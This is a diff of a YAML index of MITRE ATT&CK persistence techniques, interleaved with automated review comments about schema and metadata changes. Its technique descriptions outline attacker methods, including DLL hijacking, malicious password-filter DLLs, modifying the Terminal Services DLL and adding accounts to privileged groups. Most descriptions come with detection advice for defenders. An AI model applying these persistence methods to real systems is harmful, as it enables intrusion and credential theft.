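Review bot: the `x_mitre_platforms` change for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider`; any index file or lookup keyed on the old platform strings will silently stop matching this technique, so those derived artifacts need regenerating in the same change, or the rename needs calling out as a breaking one. The version bump to 2.5 and the new CISA contributor indicate this mirrors an upstream ATT&CK release; name that release in the commit message.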
@@ -28486,9 +28863,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
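Review bot: `spec_version: '2.1'` is deleted here, and the same deletion recurs on every other object in this patch; `spec_version` is a required common property on STIX 2.1 objects, so this only makes sense if the generator now reads a STIX 2.0 export, which should be stated explicitly and checked against any downstream tooling that validates these entries as STIX 2.1. The removal of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` in this hunk is just the key reorder (both are re-added higher in the same object) and needs no change.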
@@ -28556,19 +28930,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28584,8 +28957,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28599,7 +28972,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -28625,6 +28998,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -28652,42 +29029,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -28702,13 +29048,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -28716,11 +29067,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -28751,7 +29125,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
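Review bot: `modified` for T1505.002 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T17:05:44.321Z`; every other `modified` in this patch moves forward, so this object is being regenerated from a different (older or differently exported) copy of the technique rather than a newer revision. Confirm the source bundle is the intended one and, if the regression is expected, say so in the commit message so nobody "fixes" it later.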
@@ -28789,13 +29163,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
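Review bot: for T1505.002 this hunk deletes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, but unlike the other objects in this patch no `x_mitre_attack_spec_version: 3.2.0` is added for it; if the field is re-emitted elsewhere in the object it is not in view, so please verify the object still declares a spec version rather than ending up with none.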
@@ -28821,7 +29193,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -28863,7 +29235,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -28941,11 +29312,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29025,35 +29395,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29077,71 +29422,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
@@ -29150,24 +29484,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -29259,8 +29625,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29291,71 +29657,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
